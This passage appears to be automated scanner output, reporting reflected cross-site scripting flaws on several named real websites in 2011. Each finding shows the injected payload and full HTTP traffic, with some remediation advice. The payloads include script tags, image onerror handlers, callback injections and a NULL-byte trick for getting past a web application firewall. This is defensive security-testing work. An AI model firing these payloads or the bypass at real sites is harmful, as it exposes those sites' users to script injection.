This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /kochupusthakam76add<a>35d4dfe19df/blog/malayalam-kambi-kathakal-kochu-pusthakam-hot-stories-08e6ccaa51723198405bf5af8bd98aab75c93754.html HTTP/1.1
Host: connect.in.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix)
Pragma: no-cache
nnCoection: close
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 05 Feb 2011 21:51:15 GMT
Date: Sat, 05 Feb 2011 21:51:15 GMT
Content-Length: 27761
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont ...[SNIP]... <a href="/kochupusthakam76adda35d4dfe19df/profile.html">Kochupusthakam76add<a>35d4dfe19df</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %006e9cc<a>d0254a6f966 was submitted in the REST URL parameter 1. This input was echoed as 6e9cc<a>d0254a6f966 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%006e9cc<a>d0254a6f966/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 16:04:53 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1643
Connection: close
Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005d974"><script>alert(1)</script>c01828428ea was submitted in the REST URL parameter 1. This input was echoed as 5d974"><script>alert(1)</script>c01828428ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%005d974"><script>alert(1)</script>c01828428ea/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 16:04:52 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1789
Connection: close
Content-Type: text/html; charset=utf-8
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 39526<a>384b191b99b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /weblog/2006/03/base39526<a>384b191b99b/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 16:04:58 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Sun, 06 Feb 2011 16:04:58 GMT
Last-Modified: Sun, 06 Feb 2011 16:04:58 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1351
Connection: close
Content-Type: text/html; charset=UTF-8
4.33. http://dean.edwards.name/weblog/2006/03/base/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://dean.edwards.name
Path: /weblog/2006/03/base/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8af36"><script>alert(1)</script>770fc1d9d40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8af36\"><script>alert(1)</script>770fc1d9d40 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /weblog/2006/03/base/?8af36"><script>alert(1)</script>770fc1d9d40=1 HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009da6c"><script>alert(1)</script>d18492e2c89 was submitted in the REST URL parameter 1. This input was echoed as 9da6c"><script>alert(1)</script>d18492e2c89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%009da6c"><script>alert(1)</script>d18492e2c89 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c219f%3balert(1)//7aec04d590a was submitted in the jscallback parameter. This input was echoed as c219f;alert(1)//7aec04d590a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /al.asp?ts=20110205214821&adid=126828%2C0%2C3841%2C121057%2C0%2C0%2C0&cc=us&di=29848192%2C29951564%2C29471372%2C29167950%2C30018856%2C29875388%2C29651480&hk=1&ipid=18400&mh=57f4673cf4ad79544ac753cf0dd004c8&pid=2%2C2%2C2%2C2%2C2%2C2%2C2&pvm=8cc57e88ff824e9e3d4bdb25eca56ba9&pvu=4E02CE94902A497D8EBF5C1016534811&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0%2C0%2C0&kp=430%2C971%3B168%2C1189%3B238%2C1238%3B337%2C1717%3B479%2C2214%3B509%2C2742%3B346%2C4628%3B&prf=ll%3A2635%7Cintl%3A2738%7Cpreprochrome%3A2%7Cgetconchrome%3A251%7Ccontint%3A3224%7Ccontl%3A6220%7Cadvint%3A351%7Cadvl%3A6571%7Ctl%3A6773&jscallback=$iTXT.js.callback19c219f%3balert(1)//7aec04d590a HTTP/1.1
Host: download32.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.download32.com/nslookup-software.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-; Domain=.intellitxt.com; Expires=Wed, 06-Apr-2011 22:24:31 GMT; Path=/
Content-Type: text/javascript
Content-Length: 66
Date: Sat, 05 Feb 2011 22:24:31 GMT
Connection: close
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f646d"><script>alert(1)</script>a066d7a2f43 was submitted in the src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2773%2C2770%2C2765%2C2794%2C2792%2C2795%2C2763%2C2764%26type%3Dscript%26ipid%3D18400%26sfid%3D0f646d"><script>alert(1)</script>a066d7a2f43 HTTP/1.1
Host: download32.us.intellitxt.com
Proxy-Connection: keep-alive
Referer: http://www.download32.com/nslookup-software.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Content-Type: text/html Content-Length: 225 Date: Sat, 05 Feb 2011 22:24:19 GMT Connection: close
4.37. http://download32.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://download32.us.intellitxt.com
Path:
/intellitxt/front.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24d8b'-alert(1)-'5f3e446269e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /intellitxt/front.asp?ipid=18400&24d8b'-alert(1)-'5f3e446269e=1 HTTP/1.1 Host: download32.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.download32.com/nslookup-software.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63AIAAAEt7DS2iwA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt9+zoqAA-; Domain=.intellitxt.com; Expires=Wed, 06-Apr-2011 22:24:14 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt9+zoqAA-; Domain=.intellitxt.com; Expires=Wed, 06-Apr-2011 22:24:14 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sat, 05 Feb 2011 22:24:14 GMT Connection: close Content-Length: 10714
document.itxtDisabled=1; document.itxtDebugOn=false; if(document.itxtDisabled){ document.itxtInProg=1; if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT ...[SNIP]... ;_qoptions={tags:"721.8541.18400"};_qacct="p-fdwEfW0hIeH9U";$iTXT.js.load("http://edge.quantserve.com/quant.js");$iTXT.js.serverUrl='http://download32.us.intellitxt.com';$iTXT.js.pageQuery='ipid=18400&24d8b'-alert(1)-'5f3e446269e=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();}; }
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 11ac3%3balert(1)//b19114a24fd was submitted in the jscallback parameter. This input was echoed as 11ac3;alert(1)//b19114a24fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/advert?ts=1296942500943&refurl=http%3A%2F%2Fwww.download32.com%2Fnslookup-software.html&sid=57f4673cf4ad79544ac753cf0dd004c8&pvu=4E02CE94902A497D8EBF5C1016534811&pvm=8cc57e88ff824e9e3d4bdb25eca56ba9&ipid=18400&cc=us&rcc=us&reg=tx&dma=623&city=Dallas&dat=12%2C6%2C18&jscallback=$iTXT.js.callback1811ac3%3balert(1)//b19114a24fd HTTP/1.1 Host: download32.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.download32.com/nslookup-software.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sat, 05 Feb 2011 22:24:31 GMT Connection: close Content-Length: 13687
(function(){var nh = new $iTXT.ui.Hook({value: "windows xp",uid: "4CE10DDD0B464E3594F4EBCDDB622BF1",uidh: "b33b1a94dd4778a9dbf40e8a55fbd665",advert: (function(){var ad = new $iTXT.data.Advert('$iTXT.t ...[SNIP]... track.hook'));$iTXT.glob.track.hook.push(new $iTXT.data.Pixel(19828494,'windows vista','http://pixel.intellitxt.com/pixel.jsp?id=2794&type=script',true,'$iTXT.glob.track.hook'));try{$iTXT.js.callback1811ac3;alert(1)//b19114a24fd();}catch(e){}
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload be98b%3balert(1)//513baa1609f was submitted in the jscallback parameter. This input was echoed as be98b;alert(1)//513baa1609f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/context?ts=1296942497719&refurl=http%3A%2F%2Fwww.download32.com%2Fnslookup-software.html&sid=57f4673cf4ad79544ac753cf0dd004c8&pvu=4E02CE94902A497D8EBF5C1016534811&pvm=8cc57e88ff824e9e3d4bdb25eca56ba9&ipid=18400&cc=us&rcc=us®=tx&dma=623&city=Dallas&dat=12%2C6%2C18&pagecl=16914&jsoncl=16099&ppc=-1&hn=96&chunkkey=18400:57f4673cf4ad79544ac753cf0dd004c8:4CD59B7A613C41A19879C8AC98480C80:&data=%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A1%2Cc%3A%22Interactive%20DNS%20Query%20is%20a%20program%20designed%20to%20allow%20you%20to%20perform%20a%20query%20of%20DNS%20records.%20It%20is%20similar%20to%20the%20unix%20%5C%22dig%5C%22%20or%20%5C%22nslookup%5C%22%20commands%2C%20and%20uses%20a%20convenient%20GUI%20interface.%20Interactive%20DNS%20Query%20allows%20you%20to%20query%20for%20all%20types%20of%20DNS%20records%2C%20including%20A%2C%20MX%2C%20TXT%2C%20NS%2C%20etc.%22%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A2%2Cc%3A%22522.0%20KB%22%7D%2C%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A3%2Cc%3A%22Freeware%22%7D%2C%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A4%2Cc%3A%22Windows%2095%2C%20Windows%2098%2C%20Windows%20Me%2C%20Windows%20NT%2C%20Windows%20XP%2C%20Windows%202000%22%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A5%2Cc%3A%22The%20kick'n%20TCP%2FIP%20diagnostic%20toolkit%20-%20cool%20tools%20for%20network%20troubleshooting.%20Includes%20GeoRoute%20(a%20geographical%20trace%20route%20displayed%20on%20a%20world%20map)%2C%20iSpeed%20(an%20Internet%20speed%20tester%20whic&chunk=0&total=17&jscallback=$iTXT
.js.callback1be98b%3balert(1)//513baa1609f HTTP/1.1 Host: download32.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.download32.com/nslookup-software.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Content-Length: 63 Date: Sat, 05 Feb 2011 22:24:25 GMT Connection: close
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bd0eb%3balert(1)//fa6a87ef4aa was submitted in the jscallback parameter. This input was echoed as bd0eb;alert(1)//fa6a87ef4aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/init?ts=1296942497358&pagecl=16914&fv=10&muid=&refurl=http%3A%2F%2Fwww.download32.com%2Fnslookup-software.html&ipid=18400&jscallback=$iTXT.js.callback0bd0eb%3balert(1)//fa6a87ef4aa HTTP/1.1 Host: download32.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.download32.com/nslookup-software.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sat, 05 Feb 2011 22:24:21 GMT Connection: close Content-Length: 19890
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback0bd0eb;alert(1)//fa6a87ef4aa({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}
4.41. http://download32.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://download32.us.intellitxt.com
Path:
/v4/init
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f4db"-alert(1)-"99b36b51f6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/init?ts=1296942497358&pagecl=16914&fv=10&muid=&refurl=http%3A%2F%2Fwww.download32.com%2Fnslookup-software.html&ipid=18400&jscallback=$iTXT.js.callback0&7f4db"-alert(1)-"99b36b51f6a=1 HTTP/1.1 Host: download32.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.download32.com/nslookup-software.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sat, 05 Feb 2011 22:24:23 GMT Connection: close Content-Length: 19871
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... ozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13","REGIONNAME":"Texas","muid":"","city":"Dallas","jscallback":"$iTXT.js.callback0","7f4db"-alert(1)-"99b36b51f6a":"1","reg":"tx","refurl":"http://www.download32.com/nslookup-software.html","rcc":"us","cc":"us"},null,60);var undefined;if(null==$iTXT.glob.params||undefined==$iTXT.glob.params){$iTXT.glob.params=new ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2f79e<img%20src%3da%20onerror%3dalert(1)>26b55a1d1b2 was submitted in the REST URL parameter 1. This input was echoed as 2f79e<img src=a onerror=alert(1)>26b55a1d1b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /download-ga-81845gv-gigabyte-vga-driver_freedownload2f79e<img%20src%3da%20onerror%3dalert(1)>26b55a1d1b2 HTTP/1.1 Host: driverbyte.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72968"><img%20src%3da%20onerror%3dalert(1)>a36cb148e37 was submitted in the REST URL parameter 1. This input was echoed as 72968\"><img src=a onerror=alert(1)>a36cb148e37 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /download-ga-81845gv-gigabyte-vga-driver_freedownload72968"><img%20src%3da%20onerror%3dalert(1)>a36cb148e37 HTTP/1.1 Host: driverbyte.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b8ed7<img%20src%3da%20onerror%3dalert(1)>ec91bc08206 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b8ed7<img src=a onerror=alert(1)>ec91bc08206 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /download-ga-81845gv-gigabyte-vga-driver_freedownload?b8ed7<img%20src%3da%20onerror%3dalert(1)>ec91bc08206=1 HTTP/1.1 Host: driverbyte.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3c5e"><img%20src%3da%20onerror%3dalert(1)>e0edaa08961 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a3c5e\"><img src=a onerror=alert(1)>e0edaa08961 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /download-ga-81845gv-gigabyte-vga-driver_freedownload?a3c5e"><img%20src%3da%20onerror%3dalert(1)>e0edaa08961=1 HTTP/1.1 Host: driverbyte.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7a43e<script>alert(1)</script>9a66bdcec19 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
